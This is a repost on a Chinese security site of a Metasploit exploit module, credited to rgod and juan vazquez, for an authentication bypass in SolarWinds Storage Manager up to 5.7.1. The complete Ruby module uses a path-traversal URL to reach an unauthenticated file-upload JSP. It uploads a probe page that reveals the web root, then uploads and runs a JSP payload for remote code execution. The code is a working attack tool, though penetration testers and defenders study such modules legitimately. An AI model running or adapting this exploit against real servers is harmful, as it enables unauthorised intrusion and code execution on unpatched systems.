首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SolarWinds Storage Manager Authentication Bypass
来源:metasploit.com 作者:rgod 发布时间:2014-09-12  
## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'SolarWinds Storage Manager Authentication Bypass', 'Description' => %q{ This module exploits an authentication bypass vulnerability in Solarwinds Storage Manager. The vulnerability exists in the AuthenticationFilter, which allows to bypass authentication with specially crafted URLs. After bypassing authentication, is possible to use a file upload function to achieve remote code execution. This module has been tested successfully in Solarwinds Store Manager Server 5.1.0 and 5.7.1 on Windows 32 bits, Windows 64 bits and Linux 64 bits operating systems. }, 'Author' => [ 'rgod ', # Vulnerability Discovery 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['ZDI', '14-299'] ], 'Privileged' => true, 'Platform' => %w{ linux win }, 'Arch' => ARCH_JAVA, 'Targets' => [ ['Solarwinds Store Manager <= 5.7.1', {}] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 19 2014')) register_options( [ Opt::RPORT(9000) ], self.class) end def check res = send_request_cgi({ 'uri' => normalize_uri("/", "images", "..", "jsp", "ProcessFileUpload.jsp"), 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=----#{rand_text_alpha(10 + rand(10))}" }) if res && res.code == 200 && res.body && res.body.to_s =~ /Upload Successful!!/ return Exploit::CheckCode::Vulnerable end Exploit::CheckCode::Safe end def exploit jsp_info = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp" print_status("#{peer} - Uploading Information Gathering JSP #{jsp_info}...") if upload(jsp_info, jsp_path) print_good("#{peer} - JSP payload uploaded successfully") else fail_with(Failure::Unknown, "#{peer} - Information Gathering JSP upload failed") end res = execute(jsp_info) if res && res.code == 200 && res.body.to_s =~ /Path:(.*)/ upload_path = $1 print_good("#{peer} - Working directory found in #{upload_path}") register_file_for_cleanup(::File.join(upload_path, jsp_info)) else print_error("#{peer} - Couldn't retrieve the upload directory, manual cleanup will be required") print_warning("#{peer} - #{jsp_info} needs to be deleted manually") end jsp_payload = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp" print_status("#{peer} - Uploading JSP payload #{jsp_payload}...") if upload(jsp_payload, payload.encoded) print_good("#{peer} - JSP payload uploaded successfully") else fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed") end if upload_path register_file_for_cleanup(::File.join(upload_path, jsp_payload)) else print_warning("#{peer} - #{jsp_payload} needs to be deleted manually") end print_status("#{peer} - Executing payload...") execute(jsp_payload, 1) end def execute(jsp_name, time_out = 20) res = send_request_cgi({ 'uri' => normalize_uri("/", "images", "..", jsp_name), 'method' => 'GET' }, time_out) res end def upload(file_name, contents) post_data = Rex::MIME::Message.new post_data.add_part(contents, "application/octet-stream", nil, "form-data; name=\"#{rand_text_alpha(4 + rand(4))}\"; filename=\"#{file_name}\"") res = send_request_cgi({ 'uri' => normalize_uri("/", "images", "..", "jsp", "ProcessFileUpload.jsp"), 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'data' => post_data.to_s }) if res && res.code == 200 && res.body && res.body.to_s =~ /Upload Successful!!/ return true end false end def jsp_path jsp =<<-EOS <%@ page language="Java" import="java.util.*"%> <% out.println("Path:" + System.getProperty("server.webapp.root")); %> EOS jsp end end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Onlineon E-Ticaret Database Di
·ManageEngine Eventlog Analyzer
·Joomla Spider Contacts 1.3.6 (
·Railo 4.2.1 Remote File Inclus
·Rooted SSH/SFTP Daemon Default
·WWW File Share Pro 7.0 Denial
·HttpFileServer 2.3.x Remote Co
·Apple iOS 7.1.2 Merge Apps Ser
·ALCASAR <= 2.8.1 - Remote Root
·LeapFTP 3.1.0 URL Handling Buf
·WordPress Slideshow Gallery 1.
·Google Chrome 31.0 XSS Auditor
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved